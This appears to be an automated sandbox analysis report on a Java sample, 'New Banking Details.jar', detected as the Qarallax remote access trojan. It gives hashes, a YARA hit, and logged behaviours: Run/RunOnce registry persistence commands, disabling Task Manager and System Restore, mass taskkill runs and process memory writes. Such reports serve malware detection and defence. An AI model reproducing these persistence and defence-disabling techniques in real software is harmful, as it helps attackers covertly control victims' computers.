Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows7_x64 -
resource
win7 -
submitted
06-08-2020 07:45
Static task
static1
Behavioral task
behavioral1
Sample
New Banking Details.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
New Banking Details.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
New Banking Details.jar
-
Size
410KB
-
MD5
7ff8c97e2fe1c972876ee4cc84238074
-
SHA1
fb1d4dff5cedba4dc4eb0ddf662fc9be2d39e696
-
SHA256
d4a142b9eba6dff66deadaea2777b5ce1d7fc551f94b5e7f87ba6a84709106c9
-
SHA512
0531582de07c475fa4ebe358d5336ed810fcdb0adbcbcd8738a66b4aa7cd66eeb11837ce63cd534a23ff277f8a5d50e7a806675379f97e8e34cf45ede9d86759
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001352a-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1204 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\hmJMe\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\hmJMe\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\hmJMe\Desktop.ini java.exe File created C:\Users\Admin\hmJMe\Desktop.ini java.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\AnPpB java.exe File opened for modification C:\Windows\System32\AnPpB java.exe -
Kills process with taskkill 19 IoCs
pid Process 1948 taskkill.exe 1672 taskkill.exe 1612 taskkill.exe 1552 taskkill.exe 456 taskkill.exe 1928 taskkill.exe 1460 taskkill.exe 1344 taskkill.exe 1836 taskkill.exe 1636 taskkill.exe 1828 taskkill.exe 1340 taskkill.exe 1480 taskkill.exe 1616 taskkill.exe 1180 taskkill.exe 1952 taskkill.exe 1036 taskkill.exe 1472 taskkill.exe 1884 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1920 powershell.exe 1920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 100 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 740 WMIC.exe Token: SeSecurityPrivilege 740 WMIC.exe Token: SeTakeOwnershipPrivilege 740 WMIC.exe Token: SeLoadDriverPrivilege 740 WMIC.exe Token: SeSystemProfilePrivilege 740 WMIC.exe Token: SeSystemtimePrivilege 740 WMIC.exe Token: SeProfSingleProcessPrivilege 740 WMIC.exe Token: SeIncBasePriorityPrivilege 740 WMIC.exe Token: SeCreatePagefilePrivilege 740 WMIC.exe Token: SeBackupPrivilege 740 WMIC.exe Token: SeRestorePrivilege 740 WMIC.exe Token: SeShutdownPrivilege 740 WMIC.exe Token: SeDebugPrivilege 740 WMIC.exe Token: SeSystemEnvironmentPrivilege 740 WMIC.exe Token: SeRemoteShutdownPrivilege 740 WMIC.exe Token: SeUndockPrivilege 740 WMIC.exe Token: SeManageVolumePrivilege 740 WMIC.exe Token: 33 740 WMIC.exe Token: 34 740 WMIC.exe Token: 35 740 WMIC.exe Token: SeIncreaseQuotaPrivilege 740 WMIC.exe Token: SeSecurityPrivilege 740 WMIC.exe Token: SeTakeOwnershipPrivilege 740 WMIC.exe Token: SeLoadDriverPrivilege 740 WMIC.exe Token: SeSystemProfilePrivilege 740 WMIC.exe Token: SeSystemtimePrivilege 740 WMIC.exe Token: SeProfSingleProcessPrivilege 740 WMIC.exe Token: SeIncBasePriorityPrivilege 740 WMIC.exe Token: SeCreatePagefilePrivilege 740 WMIC.exe Token: SeBackupPrivilege 740 WMIC.exe Token: SeRestorePrivilege 740 WMIC.exe Token: SeShutdownPrivilege 740 WMIC.exe Token: SeDebugPrivilege 740 WMIC.exe Token: SeSystemEnvironmentPrivilege 740 WMIC.exe Token: SeRemoteShutdownPrivilege 740 WMIC.exe Token: SeUndockPrivilege 740 WMIC.exe Token: SeManageVolumePrivilege 740 WMIC.exe Token: 33 740 WMIC.exe Token: 34 740 WMIC.exe Token: 35 740 WMIC.exe Token: SeIncreaseQuotaPrivilege 1516 WMIC.exe Token: SeSecurityPrivilege 1516 WMIC.exe Token: SeTakeOwnershipPrivilege 1516 WMIC.exe Token: SeLoadDriverPrivilege 1516 WMIC.exe Token: SeSystemProfilePrivilege 1516 WMIC.exe Token: SeSystemtimePrivilege 1516 WMIC.exe Token: SeProfSingleProcessPrivilege 1516 WMIC.exe Token: SeIncBasePriorityPrivilege 1516 WMIC.exe Token: SeCreatePagefilePrivilege 1516 WMIC.exe Token: SeBackupPrivilege 1516 WMIC.exe Token: SeRestorePrivilege 1516 WMIC.exe Token: SeShutdownPrivilege 1516 WMIC.exe Token: SeDebugPrivilege 1516 WMIC.exe Token: SeSystemEnvironmentPrivilege 1516 WMIC.exe Token: SeRemoteShutdownPrivilege 1516 WMIC.exe Token: SeUndockPrivilege 1516 WMIC.exe Token: SeManageVolumePrivilege 1516 WMIC.exe Token: 33 1516 WMIC.exe Token: 34 1516 WMIC.exe Token: 35 1516 WMIC.exe Token: SeIncreaseQuotaPrivilege 1516 WMIC.exe Token: SeSecurityPrivilege 1516 WMIC.exe Token: SeTakeOwnershipPrivilege 1516 WMIC.exe Token: SeLoadDriverPrivilege 1516 WMIC.exe Token: SeSystemProfilePrivilege 1516 WMIC.exe Token: SeSystemtimePrivilege 1516 WMIC.exe Token: SeProfSingleProcessPrivilege 1516 WMIC.exe Token: SeIncBasePriorityPrivilege 1516 WMIC.exe Token: SeCreatePagefilePrivilege 1516 WMIC.exe Token: SeBackupPrivilege 1516 WMIC.exe Token: SeRestorePrivilege 1516 WMIC.exe Token: SeShutdownPrivilege 1516 WMIC.exe Token: SeDebugPrivilege 1516 WMIC.exe Token: SeSystemEnvironmentPrivilege 1516 WMIC.exe Token: SeRemoteShutdownPrivilege 1516 WMIC.exe Token: SeUndockPrivilege 1516 WMIC.exe Token: SeManageVolumePrivilege 1516 WMIC.exe Token: 33 1516 WMIC.exe Token: 34 1516 WMIC.exe Token: 35 1516 WMIC.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 1636 taskkill.exe Token: SeDebugPrivilege 456 taskkill.exe Token: SeDebugPrivilege 1948 taskkill.exe Token: SeDebugPrivilege 1672 taskkill.exe Token: SeDebugPrivilege 1928 taskkill.exe Token: SeDebugPrivilege 1616 taskkill.exe Token: SeDebugPrivilege 1180 taskkill.exe Token: SeDebugPrivilege 1460 taskkill.exe Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 1344 taskkill.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 1828 taskkill.exe Token: SeDebugPrivilege 1836 taskkill.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeDebugPrivilege 1036 taskkill.exe Token: SeDebugPrivilege 1612 taskkill.exe Token: SeDebugPrivilege 1472 taskkill.exe Token: SeDebugPrivilege 1552 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1204 java.exe -
Suspicious use of WriteProcessMemory 798 IoCs
description pid Process procid_target PID 1204 wrote to memory of 1584 1204 java.exe 25 PID 1204 wrote to memory of 1584 1204 java.exe 25 PID 1204 wrote to memory of 1584 1204 java.exe 25 PID 1204 wrote to memory of 296 1204 java.exe 26 PID 1204 wrote to memory of 296 1204 java.exe 26 PID 1204 wrote to memory of 296 1204 java.exe 26 PID 296 wrote to memory of 740 296 cmd.exe 27 PID 296 wrote to memory of 740 296 cmd.exe 27 PID 296 wrote to memory of 740 296 cmd.exe 27 PID 1204 wrote to memory of 1044 1204 java.exe 28 PID 1204 wrote to memory of 1044 1204 java.exe 28 PID 1204 wrote to memory of 1044 1204 java.exe 28 PID 1044 wrote to memory of 1516 1044 cmd.exe 29 PID 1044 wrote to memory of 1516 1044 cmd.exe 29 PID 1044 wrote to memory of 1516 1044 cmd.exe 29 PID 1204 wrote to memory of 1792 1204 java.exe 30 PID 1204 wrote to memory of 1792 1204 java.exe 30 PID 1204 wrote to memory of 1792 1204 java.exe 30 PID 1204 wrote to memory of 1380 1204 java.exe 31 PID 1204 wrote to memory of 1380 1204 java.exe 31 PID 1204 wrote to memory of 1380 1204 java.exe 31 PID 1204 wrote to memory of 1828 1204 java.exe 32 PID 1204 wrote to memory of 1828 1204 java.exe 32 PID 1204 wrote to memory of 1828 1204 java.exe 32 PID 1204 wrote to memory of 1180 1204 java.exe 33 PID 1204 wrote to memory of 1180 1204 java.exe 33 PID 1204 wrote to memory of 1180 1204 java.exe 33 PID 1204 wrote to memory of 1820 1204 java.exe 34 PID 1204 wrote to memory of 1820 1204 java.exe 34 PID 1204 wrote to memory of 1820 1204 java.exe 34 PID 1204 wrote to memory of 1764 1204 java.exe 35 PID 1204 wrote to memory of 1764 1204 java.exe 35 PID 1204 wrote to memory of 1764 1204 java.exe 35 PID 1204 wrote to memory of 1752 1204 java.exe 36 PID 1204 wrote to memory of 1752 1204 java.exe 36 PID 1204 wrote to memory of 1752 1204 java.exe 36 PID 1204 wrote to memory of 1732 1204 java.exe 37 PID 1204 wrote to memory of 1732 1204 java.exe 37 PID 1204 wrote to memory of 1732 1204 java.exe 37 PID 1204 wrote to memory of 1672 1204 java.exe 38 PID 1204 wrote to memory of 1672 1204 java.exe 38 PID 1204 wrote to memory of 1672 1204 java.exe 38 PID 1204 wrote to memory of 1540 1204 java.exe 39 PID 1204 wrote to memory of 1540 1204 java.exe 39 PID 1204 wrote to memory of 1540 1204 java.exe 39 PID 1204 wrote to memory of 1872 1204 java.exe 40 PID 1204 wrote to memory of 1872 1204 java.exe 40 PID 1204 wrote to memory of 1872 1204 java.exe 40 PID 1204 wrote to memory of 1920 1204 java.exe 41 PID 1204 wrote to memory of 1920 1204 java.exe 41 PID 1204 wrote to memory of 1920 1204 java.exe 41 PID 1204 wrote to memory of 1884 1204 java.exe 42 PID 1204 wrote to memory of 1884 1204 java.exe 42 PID 1204 wrote to memory of 1884 1204 java.exe 42 PID 1204 wrote to memory of 1968 1204 java.exe 45 PID 1204 wrote to memory of 1968 1204 java.exe 45 PID 1204 wrote to memory of 1968 1204 java.exe 45 PID 1204 wrote to memory of 1948 1204 java.exe 46 PID 1204 wrote to memory of 1948 1204 java.exe 46 PID 1204 wrote to memory of 1948 1204 java.exe 46 PID 1672 wrote to memory of 1072 1672 cmd.exe 50 PID 1672 wrote to memory of 1072 1672 cmd.exe 50 PID 1672 wrote to memory of 1072 1672 cmd.exe 50 PID 1204 wrote to memory of 1992 1204 java.exe 51 PID 1204 wrote to memory of 1992 1204 java.exe 51 PID 1204 wrote to memory of 1992 1204 java.exe 51 PID 1204 wrote to memory of 1552 1204 java.exe 54 PID 1204 wrote to memory of 1552 1204 java.exe 54 PID 1204 wrote to memory of 1552 1204 java.exe 54 PID 1204 wrote to memory of 1544 1204 java.exe 55 PID 1204 wrote to memory of 1544 1204 java.exe 55 PID 1204 wrote to memory of 1544 1204 java.exe 55 PID 1672 wrote to memory of 672 1672 cmd.exe 56 PID 1672 wrote to memory of 672 1672 cmd.exe 56 PID 1672 wrote to memory of 672 1672 cmd.exe 56 PID 1204 wrote to memory of 1504 1204 java.exe 58 PID 1204 wrote to memory of 1504 1204 java.exe 58 PID 1204 wrote to memory of 1504 1204 java.exe 58 PID 1204 wrote to memory of 1632 1204 java.exe 60 PID 1204 wrote to memory of 1632 1204 java.exe 60 PID 1204 wrote to memory of 1632 1204 java.exe 60 PID 1204 wrote to memory of 1508 1204 java.exe 62 PID 1204 wrote to memory of 1508 1204 java.exe 62 PID 1204 wrote to memory of 1508 1204 java.exe 62 PID 1204 wrote to memory of 1796 1204 java.exe 64 PID 1204 wrote to memory of 1796 1204 java.exe 64 PID 1204 wrote to memory of 1796 1204 java.exe 64 PID 1204 wrote to memory of 620 1204 java.exe 66 PID 1204 wrote to memory of 620 1204 java.exe 66 PID 1204 wrote to memory of 620 1204 java.exe 66 PID 1204 wrote to memory of 1340 1204 java.exe 67 PID 1204 wrote to memory of 1340 1204 java.exe 67 PID 1204 wrote to memory of 1340 1204 java.exe 67 PID 1796 wrote to memory of 1840 1796 cmd.exe 69 PID 1796 wrote to memory of 1840 1796 cmd.exe 69 PID 1796 wrote to memory of 1840 1796 cmd.exe 69 PID 1204 wrote to memory of 1636 1204 java.exe 70 PID 1204 wrote to memory of 1636 1204 java.exe 70 PID 1204 wrote to memory of 1636 1204 java.exe 70 PID 1204 wrote to memory of 2044 1204 java.exe 72 PID 1204 wrote to memory of 2044 1204 java.exe 72 PID 1204 wrote to memory of 2044 1204 java.exe 72 PID 1204 wrote to memory of 1880 1204 java.exe 73 PID 1204 wrote to memory of 1880 1204 java.exe 73 PID 1204 wrote to memory of 1880 1204 java.exe 73 PID 1204 wrote to memory of 2040 1204 java.exe 74 PID 1204 wrote to memory of 2040 1204 java.exe 74 PID 1204 wrote to memory of 2040 1204 java.exe 74 PID 1796 wrote to memory of 1480 1796 cmd.exe 76 PID 1204 wrote to memory of 1540 1204 java.exe 77 PID 1204 wrote to memory of 1540 1204 java.exe 77 PID 1204 wrote to memory of 1540 1204 java.exe 77 PID 1796 wrote to memory of 1480 1796 cmd.exe 76 PID 1796 wrote to memory of 1480 1796 cmd.exe 76 PID 1204 wrote to memory of 1872 1204 java.exe 80 PID 1204 wrote to memory of 1872 1204 java.exe 80 PID 1204 wrote to memory of 1872 1204 java.exe 80 PID 1204 wrote to memory of 560 1204 java.exe 83 PID 1204 wrote to memory of 560 1204 java.exe 83 PID 1204 wrote to memory of 560 1204 java.exe 83 PID 1204 wrote to memory of 852 1204 java.exe 85 PID 1204 wrote to memory of 852 1204 java.exe 85 PID 1204 wrote to memory of 852 1204 java.exe 85 PID 1204 wrote to memory of 672 1204 java.exe 87 PID 1204 wrote to memory of 672 1204 java.exe 87 PID 1204 wrote to memory of 672 1204 java.exe 87 PID 1204 wrote to memory of 1076 1204 java.exe 88 PID 1204 wrote to memory of 1076 1204 java.exe 88 PID 1204 wrote to memory of 1076 1204 java.exe 88 PID 1076 wrote to memory of 1592 1076 cmd.exe 89 PID 1076 wrote to memory of 1592 1076 cmd.exe 89 PID 1076 wrote to memory of 1592 1076 cmd.exe 89 PID 1204 wrote to memory of 1380 1204 java.exe 91 PID 1204 wrote to memory of 1380 1204 java.exe 91 PID 1204 wrote to memory of 1380 1204 java.exe 91 PID 1204 wrote to memory of 1756 1204 java.exe 93 PID 1204 wrote to memory of 1756 1204 java.exe 93 PID 1204 wrote to memory of 1756 1204 java.exe 93 PID 1204 wrote to memory of 1564 1204 java.exe 96 PID 1204 wrote to memory of 1564 1204 java.exe 96 PID 1204 wrote to memory of 1564 1204 java.exe 96 PID 1204 wrote to memory of 1588 1204 java.exe 97 PID 1204 wrote to memory of 1588 1204 java.exe 97 PID 1204 wrote to memory of 1588 1204 java.exe 97 PID 1204 wrote to memory of 1692 1204 java.exe 99 PID 1204 wrote to memory of 1692 1204 java.exe 99 PID 1204 wrote to memory of 1692 1204 java.exe 99 PID 1204 wrote to memory of 456 1204 java.exe 100 PID 1204 wrote to memory of 456 1204 java.exe 100 PID 1204 wrote to memory of 456 1204 java.exe 100 PID 1204 wrote to memory of 324 1204 java.exe 103 PID 1204 wrote to memory of 324 1204 java.exe 103 PID 1204 wrote to memory of 324 1204 java.exe 103 PID 1204 wrote to memory of 1904 1204 java.exe 104 PID 1204 wrote to memory of 1904 1204 java.exe 104 PID 1204 wrote to memory of 1904 1204 java.exe 104 PID 1204 wrote to memory of 1924 1204 java.exe 107 PID 1204 wrote to memory of 1924 1204 java.exe 107 PID 1204 wrote to memory of 1924 1204 java.exe 107 PID 1204 wrote to memory of 2040 1204 java.exe 109 PID 1204 wrote to memory of 2040 1204 java.exe 109 PID 1204 wrote to memory of 2040 1204 java.exe 109 PID 1204 wrote to memory of 464 1204 java.exe 111 PID 1204 wrote to memory of 464 1204 java.exe 111 PID 1204 wrote to memory of 464 1204 java.exe 111 PID 1204 wrote to memory of 1764 1204 java.exe 114 PID 1204 wrote to memory of 1764 1204 java.exe 114 PID 1204 wrote to memory of 1764 1204 java.exe 114 PID 1204 wrote to memory of 1932 1204 java.exe 116 PID 1204 wrote to memory of 1932 1204 java.exe 116 PID 1204 wrote to memory of 1932 1204 java.exe 116 PID 1204 wrote to memory of 1948 1204 java.exe 118 PID 1204 wrote to memory of 1948 1204 java.exe 118 PID 1204 wrote to memory of 1948 1204 java.exe 118 PID 1204 wrote to memory of 1672 1204 java.exe 121 PID 1204 wrote to memory of 1672 1204 java.exe 121 PID 1204 wrote to memory of 1672 1204 java.exe 121 PID 1204 wrote to memory of 1928 1204 java.exe 123 PID 1204 wrote to memory of 1928 1204 java.exe 123 PID 1204 wrote to memory of 1928 1204 java.exe 123 PID 1204 wrote to memory of 1616 1204 java.exe 125 PID 1204 wrote to memory of 1616 1204 java.exe 125 PID 1204 wrote to memory of 1616 1204 java.exe 125 PID 1204 wrote to memory of 1180 1204 java.exe 127 PID 1204 wrote to memory of 1180 1204 java.exe 127 PID 1204 wrote to memory of 1180 1204 java.exe 127 PID 1204 wrote to memory of 1460 1204 java.exe 129 PID 1204 wrote to memory of 1460 1204 java.exe 129 PID 1204 wrote to memory of 1460 1204 java.exe 129 PID 1204 wrote to memory of 1344 1204 java.exe 131 PID 1204 wrote to memory of 1344 1204 java.exe 131 PID 1204 wrote to memory of 1344 1204 java.exe 131 PID 1076 wrote to memory of 760 1076 cmd.exe 133 PID 1076 wrote to memory of 760 1076 cmd.exe 133 PID 1076 wrote to memory of 760 1076 cmd.exe 133 PID 1204 wrote to memory of 1164 1204 java.exe 134 PID 1204 wrote to memory of 1164 1204 java.exe 134 PID 1204 wrote to memory of 1164 1204 java.exe 134 PID 1204 wrote to memory of 1480 1204 java.exe 135 PID 1204 wrote to memory of 1480 1204 java.exe 135 PID 1204 wrote to memory of 1480 1204 java.exe 135 PID 1164 wrote to memory of 1628 1164 cmd.exe 137 PID 1164 wrote to memory of 1628 1164 cmd.exe 137 PID 1164 wrote to memory of 1628 1164 cmd.exe 137 PID 1164 wrote to memory of 1672 1164 cmd.exe 138 PID 1164 wrote to memory of 1672 1164 cmd.exe 138 PID 1164 wrote to memory of 1672 1164 cmd.exe 138 PID 1204 wrote to memory of 792 1204 java.exe 139 PID 1204 wrote to memory of 792 1204 java.exe 139 PID 1204 wrote to memory of 792 1204 java.exe 139 PID 792 wrote to memory of 1836 792 cmd.exe 140 PID 792 wrote to memory of 1836 792 cmd.exe 140 PID 792 wrote to memory of 1836 792 cmd.exe 140 PID 792 wrote to memory of 2028 792 cmd.exe 141 PID 792 wrote to memory of 2028 792 cmd.exe 141 PID 792 wrote to memory of 2028 792 cmd.exe 141 PID 1204 wrote to memory of 1340 1204 java.exe 142 PID 1204 wrote to memory of 1340 1204 java.exe 142 PID 1204 wrote to memory of 1340 1204 java.exe 142 PID 1340 wrote to memory of 1516 1340 cmd.exe 143 PID 1340 wrote to memory of 1516 1340 cmd.exe 143 PID 1340 wrote to memory of 1516 1340 cmd.exe 143 PID 1340 wrote to memory of 1840 1340 cmd.exe 144 PID 1340 wrote to memory of 1840 1340 cmd.exe 144 PID 1340 wrote to memory of 1840 1340 cmd.exe 144 PID 1204 wrote to memory of 1388 1204 java.exe 145 PID 1204 wrote to memory of 1388 1204 java.exe 145 PID 1204 wrote to memory of 1388 1204 java.exe 145 PID 1388 wrote to memory of 1584 1388 cmd.exe 146 PID 1388 wrote to memory of 1584 1388 cmd.exe 146 PID 1388 wrote to memory of 1584 1388 cmd.exe 146 PID 1388 wrote to memory of 1056 1388 cmd.exe 147 PID 1388 wrote to memory of 1056 1388 cmd.exe 147 PID 1388 wrote to memory of 1056 1388 cmd.exe 147 PID 1204 wrote to memory of 1948 1204 java.exe 148 PID 1204 wrote to memory of 1948 1204 java.exe 148 PID 1204 wrote to memory of 1948 1204 java.exe 148 PID 1948 wrote to memory of 1520 1948 cmd.exe 149 PID 1948 wrote to memory of 1520 1948 cmd.exe 149 PID 1948 wrote to memory of 1520 1948 cmd.exe 149 PID 1204 wrote to memory of 1952 1204 java.exe 150 PID 1204 wrote to memory of 1952 1204 java.exe 150 PID 1204 wrote to memory of 1952 1204 java.exe 150 PID 1948 wrote to memory of 560 1948 cmd.exe 152 PID 1948 wrote to memory of 560 1948 cmd.exe 152 PID 1948 wrote to memory of 560 1948 cmd.exe 152 PID 1204 wrote to memory of 1592 1204 java.exe 153 PID 1204 wrote to memory of 1592 1204 java.exe 153 PID 1204 wrote to memory of 1592 1204 java.exe 153 PID 1592 wrote to memory of 1636 1592 cmd.exe 154 PID 1592 wrote to memory of 1636 1592 cmd.exe 154 PID 1592 wrote to memory of 1636 1592 cmd.exe 154 PID 1592 wrote to memory of 1552 1592 cmd.exe 155 PID 1592 wrote to memory of 1552 1592 cmd.exe 155 PID 1592 wrote to memory of 1552 1592 cmd.exe 155 PID 1204 wrote to memory of 1628 1204 java.exe 156 PID 1204 wrote to memory of 1628 1204 java.exe 156 PID 1204 wrote to memory of 1628 1204 java.exe 156 PID 1628 wrote to memory of 1784 1628 cmd.exe 157 PID 1628 wrote to memory of 1784 1628 cmd.exe 157 PID 1628 wrote to memory of 1784 1628 cmd.exe 157 PID 1628 wrote to memory of 1904 1628 cmd.exe 158 PID 1628 wrote to memory of 1904 1628 cmd.exe 158 PID 1628 wrote to memory of 1904 1628 cmd.exe 158 PID 1204 wrote to memory of 1072 1204 java.exe 159 PID 1204 wrote to memory of 1072 1204 java.exe 159 PID 1204 wrote to memory of 1072 1204 java.exe 159 PID 1072 wrote to memory of 1860 1072 cmd.exe 160 PID 1072 wrote to memory of 1860 1072 cmd.exe 160 PID 1072 wrote to memory of 1860 1072 cmd.exe 160 PID 1072 wrote to memory of 1456 1072 cmd.exe 161 PID 1072 wrote to memory of 1456 1072 cmd.exe 161 PID 1072 wrote to memory of 1456 1072 cmd.exe 161 PID 1204 wrote to memory of 2032 1204 java.exe 162 PID 1204 wrote to memory of 2032 1204 java.exe 162 PID 1204 wrote to memory of 2032 1204 java.exe 162 PID 2032 wrote to memory of 296 2032 cmd.exe 163 PID 2032 wrote to memory of 296 2032 cmd.exe 163 PID 2032 wrote to memory of 296 2032 cmd.exe 163 PID 2032 wrote to memory of 844 2032 cmd.exe 164 PID 2032 wrote to memory of 844 2032 cmd.exe 164 PID 2032 wrote to memory of 844 2032 cmd.exe 164 PID 1204 wrote to memory of 1476 1204 java.exe 165 PID 1204 wrote to memory of 1476 1204 java.exe 165 PID 1204 wrote to memory of 1476 1204 java.exe 165 PID 1476 wrote to memory of 1060 1476 cmd.exe 166 PID 1476 wrote to memory of 1060 1476 cmd.exe 166 PID 1476 wrote to memory of 1060 1476 cmd.exe 166 PID 1476 wrote to memory of 1644 1476 cmd.exe 167 PID 1476 wrote to memory of 1644 1476 cmd.exe 167 PID 1476 wrote to memory of 1644 1476 cmd.exe 167 PID 1204 wrote to memory of 672 1204 java.exe 168 PID 1204 wrote to memory of 672 1204 java.exe 168 PID 1204 wrote to memory of 672 1204 java.exe 168 PID 672 wrote to memory of 1480 672 cmd.exe 169 PID 672 wrote to memory of 1480 672 cmd.exe 169 PID 672 wrote to memory of 1480 672 cmd.exe 169 PID 1204 wrote to memory of 1828 1204 java.exe 170 PID 1204 wrote to memory of 1828 1204 java.exe 170 PID 1204 wrote to memory of 1828 1204 java.exe 170 PID 672 wrote to memory of 1840 672 cmd.exe 171 PID 672 wrote to memory of 1840 672 cmd.exe 171 PID 672 wrote to memory of 1840 672 cmd.exe 171 PID 1204 wrote to memory of 1056 1204 java.exe 173 PID 1204 wrote to memory of 1056 1204 java.exe 173 PID 1204 wrote to memory of 1056 1204 java.exe 173 PID 1056 wrote to memory of 1520 1056 cmd.exe 174 PID 1056 wrote to memory of 1520 1056 cmd.exe 174 PID 1056 wrote to memory of 1520 1056 cmd.exe 174 PID 1056 wrote to memory of 1636 1056 cmd.exe 175 PID 1056 wrote to memory of 1636 1056 cmd.exe 175 PID 1056 wrote to memory of 1636 1056 cmd.exe 175 PID 1204 wrote to memory of 1784 1204 java.exe 176 PID 1204 wrote to memory of 1784 1204 java.exe 176 PID 1204 wrote to memory of 1784 1204 java.exe 176 PID 1784 wrote to memory of 464 1784 cmd.exe 177 PID 1784 wrote to memory of 464 1784 cmd.exe 177 PID 1784 wrote to memory of 464 1784 cmd.exe 177 PID 1784 wrote to memory of 1732 1784 cmd.exe 178 PID 1784 wrote to memory of 1732 1784 cmd.exe 178 PID 1784 wrote to memory of 1732 1784 cmd.exe 178 PID 1204 wrote to memory of 1976 1204 java.exe 179 PID 1204 wrote to memory of 1976 1204 java.exe 179 PID 1204 wrote to memory of 1976 1204 java.exe 179 PID 1976 wrote to memory of 1548 1976 cmd.exe 180 PID 1976 wrote to memory of 1548 1976 cmd.exe 180 PID 1976 wrote to memory of 1548 1976 cmd.exe 180 PID 1976 wrote to memory of 1544 1976 cmd.exe 181 PID 1976 wrote to memory of 1544 1976 cmd.exe 181 PID 1976 wrote to memory of 1544 1976 cmd.exe 181 PID 1204 wrote to memory of 1928 1204 java.exe 182 PID 1204 wrote to memory of 1928 1204 java.exe 182 PID 1204 wrote to memory of 1928 1204 java.exe 182 PID 1928 wrote to memory of 1064 1928 cmd.exe 183 PID 1928 wrote to memory of 1064 1928 cmd.exe 183 PID 1928 wrote to memory of 1064 1928 cmd.exe 183 PID 1928 wrote to memory of 1684 1928 cmd.exe 184 PID 1928 wrote to memory of 1684 1928 cmd.exe 184 PID 1928 wrote to memory of 1684 1928 cmd.exe 184 PID 1204 wrote to memory of 1992 1204 java.exe 185 PID 1204 wrote to memory of 1992 1204 java.exe 185 PID 1204 wrote to memory of 1992 1204 java.exe 185 PID 1992 wrote to memory of 1664 1992 cmd.exe 186 PID 1992 wrote to memory of 1664 1992 cmd.exe 186 PID 1992 wrote to memory of 1664 1992 cmd.exe 186 PID 1992 wrote to memory of 2028 1992 cmd.exe 187 PID 1992 wrote to memory of 2028 1992 cmd.exe 187 PID 1992 wrote to memory of 2028 1992 cmd.exe 187 PID 1204 wrote to memory of 1868 1204 java.exe 188 PID 1204 wrote to memory of 1868 1204 java.exe 188 PID 1204 wrote to memory of 1868 1204 java.exe 188 PID 1204 wrote to memory of 1836 1204 java.exe 189 PID 1204 wrote to memory of 1836 1204 java.exe 189 PID 1204 wrote to memory of 1836 1204 java.exe 189 PID 1868 wrote to memory of 1480 1868 cmd.exe 191 PID 1868 wrote to memory of 1480 1868 cmd.exe 191 PID 1868 wrote to memory of 1480 1868 cmd.exe 191 PID 1868 wrote to memory of 1900 1868 cmd.exe 192 PID 1868 wrote to memory of 1900 1868 cmd.exe 192 PID 1868 wrote to memory of 1900 1868 cmd.exe 192 PID 1204 wrote to memory of 560 1204 java.exe 193 PID 1204 wrote to memory of 560 1204 java.exe 193 PID 1204 wrote to memory of 560 1204 java.exe 193 PID 560 wrote to memory of 1552 560 cmd.exe 194 PID 560 wrote to memory of 1552 560 cmd.exe 194 PID 560 wrote to memory of 1552 560 cmd.exe 194 PID 560 wrote to memory of 1904 560 cmd.exe 195 PID 560 wrote to memory of 1904 560 cmd.exe 195 PID 560 wrote to memory of 1904 560 cmd.exe 195 PID 1204 wrote to memory of 1612 1204 java.exe 196 PID 1204 wrote to memory of 1612 1204 java.exe 196 PID 1204 wrote to memory of 1612 1204 java.exe 196 PID 1612 wrote to memory of 1036 1612 cmd.exe 197 PID 1612 wrote to memory of 1036 1612 cmd.exe 197 PID 1612 wrote to memory of 1036 1612 cmd.exe 197 PID 1612 wrote to memory of 1812 1612 cmd.exe 198 PID 1612 wrote to memory of 1812 1612 cmd.exe 198 PID 1612 wrote to memory of 1812 1612 cmd.exe 198 PID 1204 wrote to memory of 320 1204 java.exe 199 PID 1204 wrote to memory of 320 1204 java.exe 199 PID 1204 wrote to memory of 320 1204 java.exe 199 PID 320 wrote to memory of 1616 320 cmd.exe 200 PID 320 wrote to memory of 1616 320 cmd.exe 200 PID 320 wrote to memory of 1616 320 cmd.exe 200 PID 320 wrote to memory of 1556 320 cmd.exe 201 PID 320 wrote to memory of 1556 320 cmd.exe 201 PID 320 wrote to memory of 1556 320 cmd.exe 201 PID 1204 wrote to memory of 2024 1204 java.exe 202 PID 1204 wrote to memory of 2024 1204 java.exe 202 PID 1204 wrote to memory of 2024 1204 java.exe 202 PID 2024 wrote to memory of 304 2024 cmd.exe 203 PID 2024 wrote to memory of 304 2024 cmd.exe 203 PID 2024 wrote to memory of 304 2024 cmd.exe 203 PID 2024 wrote to memory of 652 2024 cmd.exe 204 PID 2024 wrote to memory of 652 2024 cmd.exe 204 PID 2024 wrote to memory of 652 2024 cmd.exe 204 